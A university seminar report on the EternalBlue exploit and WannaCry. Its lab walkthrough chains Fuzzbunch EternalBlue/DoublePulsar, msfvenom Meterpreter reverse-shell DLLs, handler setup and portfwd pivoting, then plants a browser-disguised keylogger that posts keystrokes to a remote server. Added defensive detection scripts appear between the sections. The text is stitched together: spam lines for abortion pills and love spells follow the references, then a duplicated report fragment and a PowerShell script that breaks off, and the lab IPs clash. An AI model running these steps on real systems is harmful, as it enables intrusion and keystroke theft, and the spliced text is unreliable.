Seminars in Advanced Topics in Engineering in Computer Science - The EternalBlue Exploit: how it works and affects systems
Andrea Bissoli - 1543640
November 15, 2017
Abstract
The purpose of this report is to focus on one particular aspect of the WannaCry malware, in order to understand which vulnerability it exploited and how it spread across the Internet. The report shows the EternalBlue attack and how it is possible to take control of a PC thanks to the DoublePulsar attack and a Meterpreter session. Then a case study is shown in which a pivoting attack is performed. In the end, simple keyloggers are injected into the attacked machines in order to collect some useful information.
1 Introduction
Before starting with implementation, code and technical terms, we have to understand the political scene and the events that happened during the last year.
1.1 Scenario explanation
The following bullet list summarizes the events that happened during the last year. This gives us a complete picture of the situation and makes it easy to understand the choices made by each party involved [11] [10] [7] [1]:
• August 2016: The Shadow Brokers, a mysterious online hacker group, claimed to have infiltrated the Equation Group, an elite hacking unit linked to the National Security Agency. It released a few taster files and images of the cache. The leak, announced in broken English by the group in a series of posts on Twitter, Tumblr, Pastebin and GitHub, was accompanied by claims that the group was in possession of state-sponsored cyber weapons. The zero-days presented in the released archive were for old Cisco products; then the Shadow Brokers launched an auction to sell the archive to the highest bidder.
• December 2016: In December the Shadow Brokers deleted the auction and offered direct sales.
• January 2017: No one bought the Shadow Brokers' archive. They decided to show screenshots of the lost Equation Group 2013 Windows Ops Disk. The Shadow Brokers knew that if they released this information, the vulnerabilities would be reported by the Equation Group to Microsoft and would be patched.
• February 2017: Microsoft did not release patches for the EternalBlue attack.
• March 2017: Microsoft released a patch for the SMB vulnerability to prevent the EternalBlue attack. Oracle also patched some vulnerabilities.
• April 2017: Having failed to get their price, the Shadow Brokers released the password for the encrypted archive. In mid-April 2017, the Shadow Brokers dumped a cache they claimed belonged to the NSA, and an assortment of sophisticated network exploitation tools was instantly available for anyone to reverse engineer and use.
For a brief moment, many researchers felt like kids in a candy store. It quickly became apparent that the exploits were antiques and had all been patched, or were for ancient systems. So the defenders moved on; the attackers did not. They realized that even though the defenders thought the systems were safe against these non-zero-day, unexciting attacks, they were not.
The fact is that the Eternal exploits were not zero-day vulnerabilities, because Microsoft had patched them 30 days before the actual release; the problem was that not all systems in the world had applied the latest updates.
• May 2017: Thanks to the mid-April release, WannaCry is launched.
• June 2017: In June, the Shadow Brokers announced "The Shadow Brokers Data Dump of the Month" service, a new monthly subscription model. Each month people can pay a membership fee, and the club's members then receive that month's data dump. A monthly data dump could contain: web browser, router and handset exploits and tools; select items from newer Ops Disks, including newer exploits for Windows 10; compromised network data from more SWIFT providers and central banks; compromised network data from Russian, Chinese, Iranian or North Korean nuclear and missile programs.
In the end, Rapid7 conducted a study to determine which hosts on the public IPv4 Internet expose SMB endpoints and to gather publicly available information from them. They scanned ports 139/TCP and 445/TCP (the SMB ones). They found over 4 million hosts with one or both SMB ports open, as seen in the following figure:
1.2 WannaCry explanation and MS17-010 vulnerability
WannaCry is composed of two modules: ransomware and worm. Ransomware is malicious software [9] which covertly encrypts your files, preventing you from accessing them, then demands payment for their safe recovery. WannaCry deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behaviour is called a worm.
EternalBlue [8] is the exploit used by WannaCry to spread from device to device on a network via port 445, thanks to the SMB vulnerability. While Microsoft patched it with update MS17-010 [5], many computers have not been updated and remain vulnerable.
EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE-2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.
SMB is a network file sharing protocol that allows applications on a computer to read and write to files and request services from server programs in a computer network. It is basically the default way computers are remotely managed in any environment, so a vulnerability in it has a huge impact.
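Since MS17-010 concerns the SMBv1 server specifically, a defender's first question is which clients and servers on the network still speak SMBv1 at all. The following is an added example (not code from the report or from any tool it describes) that classifies a captured SMB message and, for an SMBv1 NEGOTIATE request, lists the dialects the client offers; a client that offers no "SMB 2.x" dialect can only ever negotiate SMBv1, which is what a network sensor would flag. The header layouts follow the published MS-CIFS and MS-SMB2 specifications (SMBv1: 32-byte header with the command byte at offset 4; SMB2: 64-byte header with a 16-bit command at offset 12); the packets are constructed inline by the build_* helpers, and nothing here touches a network.

```python
"""Classify a captured SMB message and, for an SMBv1 NEGOTIATE request, list
the dialects the client offers.  Packets are constructed by the build_* helpers
below (sample input for this example); nothing here touches a network."""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72  # SMBv1 NEGOTIATE command code (MS-CIFS)


def strip_netbios(data: bytes) -> bytes:
    """Remove the 4-byte NetBIOS session header (0x00 + 3-byte big-endian length)
    that precedes every SMB message carried over TCP/445 and TCP/139."""
    if len(data) < 4 or data[0] != 0x00:
        raise ValueError("missing NetBIOS session header")
    length = int.from_bytes(data[1:4], "big")
    body = data[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated SMB message")
    return body


def classify(data: bytes) -> dict:
    """Summarise one message: protocol, command and, for an SMBv1 NEGOTIATE,
    the offered dialects plus an smb1_only flag a sensor can alert on."""
    msg = strip_netbios(data)
    if msg[:4] == SMB2_MAGIC:
        (command,) = struct.unpack_from("<H", msg, 12)  # SMB2 Command field
        return {"protocol": "SMB2", "command": command}
    if msg[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB message")
    command = msg[4]
    result = {"protocol": "SMB1", "command": command}
    if command == SMB_COM_NEGOTIATE:
        # After the 32-byte header: WordCount (1 byte), WordCount*2 parameter
        # bytes, ByteCount (uint16), then the dialect buffer.
        word_count = msg[32]
        (byte_count,) = struct.unpack_from("<H", msg, 33 + 2 * word_count)
        start = 35 + 2 * word_count
        blob = msg[start:start + byte_count]
        # Each dialect is a 0x02 buffer-format byte plus a NUL-terminated string.
        dialects = [chunk[1:].decode("ascii", "replace")
                    for chunk in blob.split(b"\x00") if chunk.startswith(b"\x02")]
        result["dialects"] = dialects
        # No "SMB 2.x" dialect offered means the client can only speak SMBv1.
        result["smb1_only"] = not any(d.startswith("SMB 2.") for d in dialects)
    return result


def build_smb1_negotiate(dialects) -> bytes:
    """Construct an SMBv1 NEGOTIATE request (constructed sample input)."""
    header = SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 27  # 32 bytes
    blob = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(blob)) + blob
    return b"\x00" + len(body).to_bytes(3, "big") + body


def build_smb2_negotiate() -> bytes:
    """Construct a minimal SMB2 NEGOTIATE request (command 0) for contrast."""
    header = SMB2_MAGIC + struct.pack("<HHIHH", 64, 0, 0, 0, 0) + b"\x00" * 48
    return b"\x00" + len(header).to_bytes(3, "big") + header


if __name__ == "__main__":
    for pkt in (build_smb1_negotiate(["PC NETWORK PROGRAM 1.0", "NT LM 0.12"]),
                build_smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"]),
                build_smb2_negotiate()):
        print(classify(pkt))
```

A modern Windows client that still has SMBv1 enabled sends the SMBv1 NEGOTIATE with "SMB 2.002"/"SMB 2.???" in its dialect list and then upgrades; the first constructed packet above, which offers only legacy dialects, is the case worth inventorying before relying on patch status alone.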
2 Setting up the practical scenario
Now we are going to see the case study taken into consideration. First, it will be shown how the network is built, which OS runs on each computer and how to install the secondary tools. Then the attack vector will be exposed, that is, the steps taken to reach the goal, and in the end the implementation of the two keyloggers.
2.1 Environment setting
In our environment there are three computers:
• Kali Linux as attack machine, running Fuzzbunch and the Metasploit framework. IP: 191.168.1.164
• Windows 7 64-bit as pivot vulnerable host, with two adapters. IPs: 10.10.10.134 and 191.168.1.134
• Windows 7 64-bit as target vulnerable host. IP: 10.10.10.175
In the following picture a graphic representation can be seen:
Kali Linux setting
In the Kali Linux machine we have to install two tools: Fuzzbunch and the Metasploit framework.
One of the elements in the Shadow Brokers data dump is Fuzzbunch. Fuzzbunch can be compared to Metasploit, but it is written in Python instead of Ruby. It is an easy-to-use framework that lets the operator launch exploits and interact with the implants. The Fuzzbunch framework contains several ready-to-use exploits, each for specific types of targets. Thanks to this guide [4] it is possible to install Fuzzbunch on Kali Linux. The Metasploit framework is already installed.
Windows 7 64-bit setting
Regarding the Windows 7 computers, it is not necessary to install anything.
2.2 Attack vector
The implemented attack vector is the following:
1. Take control of the pivot machine thanks to the EternalBlue and DoublePulsar attacks.
2. Upload the keylogger into the pivot machine.
3. Through the pivot machine, take control of the target machine. This is done thanks to port forwarding and a proxy on the pivot machine.
4. Upload the keylogger into the target machine.
The keylogger is made in such a way that it is put into the browser folder and renamed with the browser name, so when the victim launches the browser it launches the keylogger, which then starts the actual browser. Every time the keylogger starts it sends the log file to a remote server. It does an HTTP POST; since in C++ it is difficult to do an HTTP POST, I did it with four lines in Python and then, with a tool, it is transformed into an executable file. Hence, the keylogger calls this module to send the keystrokes to the server.
2.3 Keylogger: theory and implementation
Keylogging, often referred to as keyboard capturing or keystroke logging, is the action of recording or monitoring every key pressed on a keyboard [2]. There are several basic technologies which can be used to intercept keystrokes and mouse events, and many keyloggers use these technologies [3].
The main idea behind keyloggers is to get in between any two links in the chain of events between when a key is pressed and when information about that keystroke is displayed on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard, wiring or the computer itself, intercepting input/output, substituting the keyboard driver or the filter driver in the keyboard stack, intercepting kernel functions by any means possible (substituting addresses in system tables, splicing function code, etc.), intercepting DLL functions in user mode, and, finally, requesting information from the keyboard using standard documented methods.
The most common methods used to construct keylogging software are the following:
• a system hook which intercepts the notification that a key has been pressed (installed using the WinAPI SetWindowsHook for messages sent by the window procedure; it is most often written in C). So for the first part we hook the keyboard input in order to receive it too:
Then the handlekeys function implements the keylogging logic, that is, it gets the keystrokes and saves them into the log file.
• a cyclical information request from the keyboard (using the WinAPI Get(Async)KeyState or GetKeyboardState; most often written in Visual Basic, sometimes in Borland Delphi). For this type of keylogger the main part is the following:
• using a filter driver (requires specialized knowledge and is written in C).
3 The practical case
Now we will see how the attack is implemented. First the first-hop attack is shown, then the more interesting one, that is, how to pivot through the first machine [6].
3.1 First hop
The target of this attack is the first computer, that is, the pivot machine.
3.1.1 Open Fuzzbunch and launch the EternalBlue attack
Open Fuzzbunch through these commands:
#!/bin/bash
export WINEPREFIX=$HOME/.wine-fuzzbunch
cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
wine cmd.exe
# the next line is typed at the Wine cmd.exe prompt that opens:
python fb.py
and set Default Target IP (the pivot's IP) and Default Callback IP Address (the attacker's IP) as follows:
Now we can use the EternalBlue attack module, so type:
use eternalblue
Most of the settings are defaults, but be careful when it comes time to define the delivery mechanism. Be sure to select "Traditional deployment from within FUZZBUNCH" here:
At this point we are ready to run the exploit. If everything is set up correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you are sure the host is vulnerable:
3.1.2 Build the DLL to inject
Once the EternalBlue exploit is successful, the next step is to use the DoublePulsar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a Meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and, to make things easier, we will generate the payload in the directory that Fuzzbunch is launched from:
cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.164 lport=45467 --platform windows -f dll -o file.dll
3.1.3 Prepare the Metasploit framework
We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected, by using exploit/multi/handler and making sure the payload, LPORT and LHOST match our msfvenom command from the previous step. So the commands are:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.164
set LPORT 45467
run
and in the end we will have:
3.1.4 Run the DoublePulsar attack
The next step is to run DoublePulsar and inject the malicious DLL file. Type the following command in Fuzzbunch to use DoublePulsar:
use doublepulsar
In our private practice lab we are targeting a 64-bit vulnerable Windows 7 installation. In this case we need to change the default setting for the architecture to 64-bit and keep all other variables at their defaults until we reach the Function settings.
Instead of the default option for the Function variable we choose to inject and run a DLL. You have probably guessed already that we are injecting the malicious DLL that we generated with msfvenom earlier. Choose option 2 from the Function settings. Then we need to enter the location of the DLL file; the other options can be left at their defaults.
Choose the default options for all other variable settings until Fuzzbunch asks us whether we want to execute DoublePulsar. If all was successful the output should look like:
3.1.5 Wait and use Meterpreter
When we switch to the handler listener we should have a reverse shell from the pivot host, which we can now interact with:
3.2 Second hop
Once the pivot host's externally facing service is compromised and a Meterpreter shell is obtained, we want to reach the internal network in order to compromise other computers as well.
3.2.1 Set pivoting
To reach our target we need to configure portfwd to relay traffic to internal hosts. The command in this case is:
portfwd add -l 9000 -p 445 -r 10.10.10.183
The breakdown of the command is as follows:
• -l 9000: the port that will receive the traffic on the attacker host
• -p 445: the port on the internal victim that will be accessed
• -r 10.10.10.183: the internal victim, that is, our target
Once the portfwd is established, the attacker machine is listening on port 9000 and anything sent to that port will reach the internal victim on the defined destination port (445).
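From the defender's side, the two SMB behaviours this report describes leave distinct traces in connection logs: the public exposure of ports 139/445 measured by Rapid7 in section 1.1 and, in this section, a compromised host re-using SMB to reach further internal machines (the worm spread of section 1.2, or the pivot just configured). The following is an added example (not code from the report or from any tool it describes) that runs three such checks over constructed firewall-style log lines. The log lines, the HOST_INTERFACES asset map and the field names (src, dst, dport) are all assumptions made up for the example; the pivot rule needs the asset map because, as in the report's lab, a dual-homed pivot shows up under two different addresses.

```python
"""Detection logic over connection-log lines for SMB exposure, SMB fan-out
(worm-like spread) and pivot-like behaviour.  All sample data is constructed."""
import ipaddress
import re
from collections import defaultdict

SMB_PORTS = {139, 445}
# RFC 1918 ranges; anything outside them is treated as "external" here.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)")

# Constructed asset map (assumption): the pivot host has two adapters, so both
# addresses must be attributed to one host before the pivot rule can fire.
HOST_INTERFACES = {"pivot-host": {"198.51.100.20", "10.10.10.134"}}

# Constructed sample log (not from the report): an external client reaches the
# pivot's outside address, then the pivot's inside address reaches four peers.
SAMPLE_LOG = """\
2017-11-15T10:00:01 src=203.0.113.7 dst=198.51.100.20 dport=445 action=allow
2017-11-15T10:00:02 src=203.0.113.7 dst=198.51.100.20 dport=139 action=allow
2017-11-15T10:05:00 src=10.10.10.134 dst=10.10.10.175 dport=445 action=allow
2017-11-15T10:05:01 src=10.10.10.134 dst=10.10.10.176 dport=445 action=allow
2017-11-15T10:05:02 src=10.10.10.134 dst=10.10.10.177 dport=445 action=allow
2017-11-15T10:05:03 src=10.10.10.134 dst=10.10.10.178 dport=445 action=allow
2017-11-15T10:06:00 src=10.10.10.50 dst=10.10.10.1 dport=445 action=allow
2017-11-15T10:07:00 src=10.10.10.50 dst=10.10.10.1 dport=80 action=allow
"""


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_log(text: str) -> list:
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, dport = m.groups()
            events.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport)})
    return events


def smb_events(events) -> list:
    return [e for e in events if e["dport"] in SMB_PORTS]


def exposed_smb(events) -> set:
    """Hosts that accepted SMB from a non-RFC1918 source: the exposure Rapid7 measured."""
    return {e["dst"] for e in smb_events(events) if not is_internal(e["src"])}


def smb_fanout(events, threshold: int = 3) -> dict:
    """Sources that opened SMB to at least `threshold` distinct peers (worm-like spread)."""
    peers = defaultdict(set)
    for e in smb_events(events):
        peers[e["src"]].add(e["dst"])
    return {src: len(d) for src, d in peers.items() if len(d) >= threshold}


def pivot_candidates(events, host_map=HOST_INTERFACES) -> list:
    """Hosts that both received SMB from outside and initiated SMB to internal peers."""
    inbound_ext = {e["dst"] for e in smb_events(events) if not is_internal(e["src"])}
    outbound_int = {e["src"] for e in smb_events(events) if is_internal(e["dst"])}
    return [h for h, ifaces in host_map.items()
            if ifaces & inbound_ext and ifaces & outbound_int]


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("exposed SMB:", exposed_smb(ev))
    print("SMB fan-out:", smb_fanout(ev))
    print("pivot candidates:", pivot_candidates(ev))
```

The fan-out threshold is deliberately low for the eight constructed lines; on real telemetry it would be tuned per subnet, and file servers and domain controllers, which legitimately receive SMB from many peers, need to be excluded from the exposure and pivot rules by the same asset map.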
3.2.2 Open Fuzzbunch and launch the EternalBlue attack
As above, open Fuzzbunch through these commands:
#!/bin/bash
export WINEPREFIX=$HOME/.wine-fuzzbunch
cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
wine cmd.exe
# the next line is typed at the Wine cmd.exe prompt that opens:
python fb.py
and set Default Target IP and Default Callback IP Address (the attacker's IP). This time the Default Target IP will be 127.0.0.1, because all traffic for the target will pass through the attacker's localhost.
Now we can use the EternalBlue attack module, so type:
use eternalblue
Most of the settings are defaults, but be careful when it comes time to define the target port. In this case we have to use the local port defined in the portfwd command, 9000, since EternalBlue defaults to 445. Hit enter at the Prompt for Variable Settings prompt to enter the new target port:
The next setting that deviates from the defaults is the delivery mechanism. Be sure to select "Traditional deployment from within FUZZBUNCH" here:
At this point we're ready to run the exploit. If everything is set up correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you're sure the host is vulnerable:
3.2.3 Build the DLL to inject
Once the EternalBlue exploit is successful, the next step is to use the DoublePulsar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a Meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and, to make things easier, we will generate the payload in the directory that Fuzzbunch is launched from:
cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.164 lport=9000 --platform windows -f dll -o file2.dll
3.2.4 Prepare the Metasploit framework
We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected, by using exploit/multi/handler. In this case we do not have to match the options of the first hop (LPORT, LHOST), because the information flows from the target to the pivot and from the pivot to the attacker. Hence we have to set the port defined in the portfwd command above. So the commands are:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.164
set LPORT 9000
run
and in the end we will have:
3.2.5 Run the DoublePulsar attack
Next, from Fuzzbunch run "use doublepulsar". Be sure that the target port matches (9000 in this case).
Once configured, it should look something like this:
If all was successful the output should look like:
3.2.6 Wait and use Meterpreter
When we switch to the handler listener we should have a reverse shell from the target host, which we can now interact with:
3.3 Keylogger injection
In order to put the keylogger inside the machines we have to run the following commands. The goal is to upload the malicious files into the browser directory. One is the actual keylogger, the other one is the send-data module. In the end we will have the actual browser renamed to browser_old.exe, while the malicious ones will be browser.exe and send_data.exe.
shell
cd "C:\Program Files (x86)\Google\Chrome\Application"
rename chrome.exe chrome_old.exe
upload /root/Desktop/send_data.exe "C:\Program Files (x86)\Google\Chrome\Application"
upload /root/Desktop/send_data.exe "C:\Program Files (x86)\Google\Chrome\Application"
Now we have to wait for the user to open the browser, so that the keylogger sends its data to the server.
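The swap described in section 2.2 and performed here leaves a characteristic footprint in the browser's install directory: the vendor binary no longer matches its known-good hash, a renamed copy of the original sits beside it, and an extra executable (the send-data module) appears. The following is an added example (not code from the report) that audits a directory for exactly those three signs. It assumes a known_good map of file name to SHA-256 that a defender would obtain from a vendor manifest or from a clean reference install (no real hashes are given here), and it constructs the post-injection directory in a temporary folder so that it runs offline without touching a real browser.

```python
"""Integrity audit for a browser install directory, aimed at the rename-and-
replace trick: original renamed to <name>_old.exe, a look-alike dropped under
the original name, and an extra helper executable.  The directory audited by
build_demo_dir() is constructed; no real browser or real hash is involved."""
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_browser_dir(directory: str, known_good: dict) -> list:
    """known_good maps file name -> expected SHA-256 of the vendor binary
    (assumed to come from a vendor manifest or a clean reference install).
    Returns a sorted list of (finding, file) tuples."""
    findings = []
    names = set(os.listdir(directory))
    for name, expected in known_good.items():
        path = os.path.join(directory, name)
        if not os.path.exists(path):
            findings.append(("missing", name))
            continue
        if sha256_file(path) != expected:
            findings.append(("hash-mismatch", name))
        stem, ext = os.path.splitext(name)
        # A renamed copy of the original next to the replaced binary is the
        # footprint the upload sequence above leaves behind.
        for suffix in ("_old", "old", "_bak"):
            sibling = f"{stem}{suffix}{ext}"
            if sibling in names:
                findings.append(("renamed-original", sibling))
                if sha256_file(os.path.join(directory, sibling)) == expected:
                    findings.append(("original-moved", sibling))
    # Any executable the vendor manifest does not list is worth a look too.
    flagged = {f for _, f in findings}
    for name in sorted(names - set(known_good)):
        if name.lower().endswith(".exe") and name not in flagged:
            findings.append(("unexpected-exe", name))
    return sorted(findings)


def build_demo_dir():
    """Construct a directory that mimics the post-injection state (sample data).
    Returns (directory, known_good) where known_good holds the hash of the
    constructed 'original' so the audit has a reference to compare against."""
    d = tempfile.mkdtemp()
    real = b"MZ constructed original browser bytes"
    with open(os.path.join(d, "chrome_old.exe"), "wb") as f:
        f.write(real)                       # the real browser, renamed
    with open(os.path.join(d, "chrome.exe"), "wb") as f:
        f.write(b"MZ constructed look-alike launcher bytes")
    with open(os.path.join(d, "send_data.exe"), "wb") as f:
        f.write(b"MZ constructed helper bytes")
    return d, {"chrome.exe": hashlib.sha256(real).hexdigest()}


if __name__ == "__main__":
    directory, known_good = build_demo_dir()
    for finding in audit_browser_dir(directory, known_good):
        print(*finding)
```

On a real estate the same check is cheaper when driven from Authenticode signatures rather than a hash list, but the hash form above is what a file-integrity monitor or a periodic scan can run without vendor tooling, and the "original-moved" finding (the renamed sibling still matching the vendor hash) is the one that distinguishes this trick from an ordinary corrupted install.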
4 Conclusions
We have seen how Fuzzbunch with EternalBlue and DoublePulsar is a strong and powerful Metasploit-like framework. Furthermore, we have seen how to perform pivoting with these tools. As we can see, it easily enters a computer that has this vulnerability, and it also enters internal networks. This bug was patched, but today 4 million public IPs are still vulnerable, so they can be attacked. Moreover, if an attacker is able to enter a company computer with other techniques (such as phishing, etc.), and if the corporate internal network cannot update its internal PCs, the malicious person can enter with the technique seen above.
References
[1] Rebekah Brown. The Shadow Brokers Leaked Exploits Explained. Ed. by Rapid7. URL: https://blog.rapid7.com/2017/04/18/the-shadow-brokers-leaked-exploits-faq/ (visited on 2017).
[2] Nikolay Grebennikov. Keyloggers: How they work and how to detect them. Ed. by AO Kaspersky Lab. URL: https://securelist.com/analysis/publications/36138/keyloggers-how-they-work-and-how-to-detect-them-part-1/ (visited on 2007).
[3] Nikolay Grebennikov. Keyloggers: Implementing keyloggers in Windows. Part Two. Ed. by AO Kaspersky Lab. URL: https://securelist.com/analysis/publications/36358/keyloggers-implementing-keyloggers-in-windows-part-two/ (visited on 2011).
[4] mdiazcl. Kali/fuzzbunch-debian deployment guide. URL: https://github.com/mdiazcl/fuzzbunch-debian (visited on 2017).
[5] Microsoft. Microsoft Security Bulletin MS17-010 - Critical. Ed. by Microsoft. URL: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx (visited on 2017).
[6] Joe Norton. Running Fuzzbunch on Kali Through a Meterpreter Port Forward. URL: https://medium.com/@joe_norton/running-eternalblue-on-kali-through-a-meterpreter-port-forward-edd877dfd724 (visited on 2017).
[7] Jon Hart, Dustin Myers, Vasudha Shivamoggi, Philip Thomsen, Rebekah Brown, Bob Rudis. 2017 Q2 Rapid7 Quarterly Threat Report. Ed. by Rapid7. URL: https://information.rapid7.com/rs/411-NAK-970/images/rapid7-2017Q2-threat-report.pdf (visited on 2017).
[8] Tom Reeve. WannaCry not first to exploit NSA EternalBlue, DoublePulsar malware. Ed. by SC Magazine UK. URL: https://www.scmagazineuk.com/wannacry-not-first-to-exploit-nsa-eternalblue-doublepulsar-malware/article/661887/ (visited on 2017).
[9] boB Rudis. Wanna Decryptor (WNCRY) Ransomware Explained. Ed. by Rapid7. URL: https://blog.rapid7.com/2017/05/12/wanna-decryptor-wncry-ransomware-explained/ (visited on 2017).
[10] The Guardian. Hacking group auctions 'cyber weapons' stolen from NSA. URL: https://www.theguardian.com/technology/2016/aug/16/shadow-brokers-hack-auction-nsa-malware-equation-group (visited on 2016).
[11] theshadowbrokers. OH LORDY! Comey Wanna Cry Edition. Ed. by Steemit. URL: https://steemit.com/shadowbrokers/@theshadowbrokers/oh-lordy-comey-wanna-cry-edition (visited on 2017).
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 

The EternalBlue Exploit: how it works and affects systems

The Shadow Brokers knew that if they released this information, the vulnerabilities would be reported by the Equation Group to Microsoft and patched.

• February 2017: Microsoft released no patch for the EternalBlue attack.

• March 2017: Microsoft released a patch for the SMB vulnerability to prevent the EternalBlue attack. Oracle also patched some vulnerabilities.

• April 2017: Having failed to get their price, the Shadow Brokers released the password for the encrypted archive. In mid-April 2017 the Shadow Brokers dumped a cache they claimed belonged to the NSA, and an assortment of sophisticated network exploitation tools was instantly available for anyone to reverse engineer and use. For a brief moment, many researchers felt like kids in a candy store. It quickly became apparent that the exploits were antiques that had all been patched, or were for ancient systems. So the defenders moved on; the attackers did not. They realized that even though the defenders thought their systems were safe against these non-zero-day, unexciting attacks, they were not. The fact is that the Eternal exploits were not zero-day vulnerabilities, because Microsoft had patched them 30 days before the actual release; the problem was that not all systems in the world had installed the latest updates.

• May 2017: Thanks to the mid-April release, WannaCry is launched.

• June 2017: In June the Shadow Brokers announced "The Shadow Brokers Data Dump of the Month" service, a new monthly subscription model. Each month people can pay a membership fee, and the club's members receive that month's data dump. A monthly data dump could contain: web browser, router and handset exploits and tools; select items from newer Ops Disks, including newer exploits for Windows 10; compromised network data from more SWIFT providers and central banks; compromised network data from Russian, Chinese, Iranian or North Korean nuclear and missile programs.

Finally, Rapid7 ran a study to determine which hosts on the public IPv4 Internet expose SMB endpoints, and to gather publicly available information from them. They scanned ports 139/TCP and 445/TCP (the SMB ports) and found over 4 million hosts with one or both SMB ports open, as seen in the following figure:
1.2 WannaCry explanation and MS17-010 vulnerability

WannaCry is composed of two modules: a ransomware and a worm. Ransomware is malicious software [9] which covertly encrypts your files, preventing you from accessing them, and then demands payment for their safe recovery. WannaCry deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behaviour is called a worm. EternalBlue [8] is the worm used by WannaCry; it can spread from device to device on a network via port 445, thanks to the SMB vulnerability. While Microsoft patched it with update MS17-010 [5], many computers have not been updated and remain vulnerable.

EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE-2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.

SMB is a network file sharing protocol that allows applications on a computer to read and write to files and request services from server programs in a computer network. It is basically the default way computers are remotely managed in any environment, so a vulnerability in it has a huge impact.
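The two conditions the report says WannaCry needed, a missing MS17-010 update and an SMBv1 server listening on 445, can both be audited from the host itself. The following PowerShell script is an added example written for this page, not code from the report or from Microsoft. It assumes a Windows 7 SP1 / Server 2008 R2 host like the ones in the lab, an elevated prompt, and that KB4012212 (security-only) and KB4012215 (monthly rollup) are the MS17-010 packages for that platform; because later cumulative rollups supersede those KB ids, "not found" is reported as a warning rather than as proof the host is unpatched.

```powershell
# Added example (not from the report): audit a Windows 7 / 2008 R2 host for an
# unpatched or enabled SMBv1 server, and optionally disable SMBv1.
# Assumptions: run as Administrator; KB4012212 / KB4012215 are the MS17-010
# packages for Windows 7 SP1 / Server 2008 R2 (later rollups supersede them).

param([switch]$Remediate)

$Ms17010Kbs = @('KB4012212', 'KB4012215')
$LanmanKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Installed {
    # Get-HotFix reads the installed-update list; a missing id is only a warning
    # because a newer cumulative rollup may contain the same fix.
    $found = Get-HotFix -Id $Ms17010Kbs -ErrorAction SilentlyContinue
    return [bool]$found
}

function Get-Smb1ServerState {
    # On Windows 7 the SMBv1 server is controlled by the SMB1 DWORD under
    # LanmanServer\Parameters; an absent value means enabled (the default).
    $props = Get-ItemProperty -Path $LanmanKey -ErrorAction SilentlyContinue
    if ($null -eq $props -or $null -eq $props.SMB1) { return 'Enabled (default, value absent)' }
    if ($props.SMB1 -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Get-SmbListeners {
    # netstat -ano is present on Windows 7; keep only LISTENING sockets on 139/445.
    netstat -ano | Select-String -Pattern ':(445|139)\s+.*LISTENING'
}

function Disable-Smb1Server {
    # Microsoft's documented registry method for Windows 7 / 2008 R2; needs a reboot.
    Set-ItemProperty -Path $LanmanKey -Name SMB1 -Type DWORD -Value 0 -Force
}

$patched = Test-Ms17010Installed
$smb1    = Get-Smb1ServerState

Write-Output ("MS17-010 KB present : {0}" -f $patched)
Write-Output ("SMBv1 server        : {0}" -f $smb1)
Write-Output "Listening SMB ports :"
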